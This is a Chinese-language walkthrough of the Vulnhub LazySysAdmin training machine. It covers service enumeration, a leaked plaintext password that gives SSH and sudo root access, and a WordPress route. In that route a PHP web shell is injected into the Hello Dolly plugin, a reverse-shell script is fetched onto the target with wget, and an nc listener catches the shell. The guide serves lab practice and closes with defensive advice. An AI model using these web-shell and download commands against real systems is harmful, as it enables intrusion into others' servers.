Vulnhub-LazySysAdmin 通关指南
字数 1308 2025-08-29 08:32:30

Vulnhub-LazySysAdmin 通关指南

背景介绍

LazySysAdmin 是 Vulnhub 上的一个渗透测试靶机,难度为中等/初学者级别。该靶机旨在:

  1. 教授初学者基本的 Linux 枚举技巧
  2. 帮助学习者熟悉 Linux 服务配置
  3. 最终目标是获取 root 权限并找到 flag

关键提示

  • 枚举是关键
  • 需要耐心尝试
  • 不要错过明显的信息

信息收集阶段

网络扫描

  1. 使用 netdiscover 确定靶机 IP
  2. 使用 nmap 扫描开放端口,发现以下服务:
    • MySQL
    • InspIRCd (聊天服务器)
    • Samba (Windows 与 UNIX 文件共享服务)

Web 服务枚举

  1. 80 端口运行着一个静态 HTML 页面
  2. 目录扫描发现:
    • phpMyAdmin
    • WordPress

WordPress 发现

  • 用户名:admin
  • 主题:twentyfifteen v1.8
  • 无插件安装
  • 页面中多次重复 "My name is togie"

Samba 服务利用

  1. 发现两个共享:

    • printf$ (打印机,无法连接)
    • share$ (可访问的共享文件夹)

  2. 在共享文件夹中发现 WordPress 站点目录,可以下载文件

关键文件

  • deets.txt 内容: 
    CBF Remembering all these passwords.
Remember to remove this file and update your password after we push out the server.
Password 12345

攻击路径一:SSH 直接登录

  1. 尝试使用用户名 togie 和密码 12345 登录 SSH

    • 成功登录,但发现是受限 shell (rbash)

  2. 检查 sudo 权限:

    sudo su
    • 使用相同密码成功提权到 root

  3. 获取 flag

注意:这可能是非预期解,体现了"懒惰管理员"的主题

攻击路径二:WordPress 渗透

数据库凭证获取

  1. 从 WordPress 配置文件 wp-config.php 中获取数据库凭证

  2. 尝试通过 phpMyAdmin 写 shell,但发现功能受限

WordPress 管理员登录

  1. 尝试使用数据库密码作为 WordPress 管理员密码

    • 成功登录 WordPress 后台

  2. 通过修改插件代码实现 RCE:

    • 编辑 "Hello Dolly" 插件,添加代码: 
      $lyrics = "<pre>".shell_exec($_GET['cmd'])."</pre>";
return wptexturize($lyrics);

  3. 通过 Web 执行命令:

    http://靶机IP/wordpress/wp-admin/index.php?cmd=whoami

反弹 Shell 建立

  1. 上传反弹 shell 脚本 (可通过 Gist 等方式)

    <?php
// 反弹 shell 代码
?>

  2. 使用 wget 下载到靶机:

    ?cmd=wget https://gist.githubusercontent.com/.../rev.php

  3. 攻击机监听:

    nc -lnvp 2333

  4. 访问 rev.php 获取 shell

  5. 升级为完整 TTY:

    python3 -c 'import pty; pty.spawn("/bin/bash")'

总结与经验

  1. 渗透测试需要多角度尝试,往往有多种攻击路径
  2. 信息收集阶段至关重要,所有发现都应记录
  3. 管理员常见错误:
    • 密码复用
    • 敏感信息明文存储
    • 不及时清理临时凭证
  4. 防御建议:
    • 定期更换密码
    • 严格控制文件权限
    • 删除不必要的敏感文件
    • 限制 sudo 权限

技术要点回顾

  1. 服务枚举:nmap, dirb/dirbuster
  2. Samba 利用:smbclient
  3. WordPress 测试:WPScan
  4. 受限 shell 绕过:rbash 限制突破
  5. Web Shell:通过插件修改实现 RCE
  6. 权限提升:sudo 滥用

通过这个靶机,学习者可以掌握基本的服务枚举、凭证利用和权限提升技巧,理解系统管理员常见的安全疏忽。

Vulnhub-LazySysAdmin 通关指南 背景介绍 LazySysAdmin 是 Vulnhub 上的一个渗透测试靶机,难度为中等/初学者级别。该靶机旨在: 教授初学者基本的 Linux 枚举技巧 帮助学习者熟悉 Linux 服务配置 最终目标是获取 root 权限并找到 flag 关键提示 : 枚举是关键 需要耐心尝试 不要错过明显的信息 信息收集阶段 网络扫描 使用 netdiscover 确定靶机 IP 使用 nmap 扫描开放端口,发现以下服务: MySQL InspIRCd (聊天服务器) Samba (Windows 与 UNIX 文件共享服务) Web 服务枚举 80 端口运行着一个静态 HTML 页面 目录扫描发现: phpMyAdmin WordPress WordPress 发现 : 用户名:admin 主题:twentyfifteen v1.8 无插件安装 页面中多次重复 "My name is togie" Samba 服务利用 发现两个共享: printf$ (打印机,无法连接) share$ (可访问的共享文件夹) 在共享文件夹中发现 WordPress 站点目录,可以下载文件 关键文件 : deets.txt 内容: 攻击路径一:SSH 直接登录 尝试使用用户名 togie 和密码 12345 登录 SSH 成功登录,但发现是受限 shell (rbash) 检查 sudo 权限: 使用相同密码成功提权到 root 获取 flag 注意 :这可能是非预期解,体现了"懒惰管理员"的主题 攻击路径二:WordPress 渗透 数据库凭证获取 从 WordPress 配置文件 wp-config.php 中获取数据库凭证 尝试通过 phpMyAdmin 写 shell,但发现功能受限 WordPress 管理员登录 尝试使用数据库密码作为 WordPress 管理员密码 成功登录 WordPress 后台 通过修改插件代码实现 RCE: 编辑 "Hello Dolly" 插件,添加代码: 通过 Web 执行命令: 反弹 Shell 建立 上传反弹 shell 脚本 (可通过 Gist 等方式) 使用 wget 下载到靶机: 攻击机监听: 访问 rev.php 获取 shell 升级为完整 TTY: 总结与经验 渗透测试需要多角度尝试,往往有多种攻击路径 信息收集阶段至关重要,所有发现都应记录 管理员常见错误: 密码复用 敏感信息明文存储 不及时清理临时凭证 防御建议: 定期更换密码 严格控制文件权限 删除不必要的敏感文件 限制 sudo 权限 技术要点回顾 服务枚举 :nmap, dirb/dirbuster Samba 利用 :smbclient WordPress 测试 :WPScan 受限 shell 绕过 :rbash 限制突破 Web Shell :通过插件修改实现 RCE 权限提升 :sudo 滥用 通过这个靶机,学习者可以掌握基本的服务枚举、凭证利用和权限提升技巧,理解系统管理员常见的安全疏忽。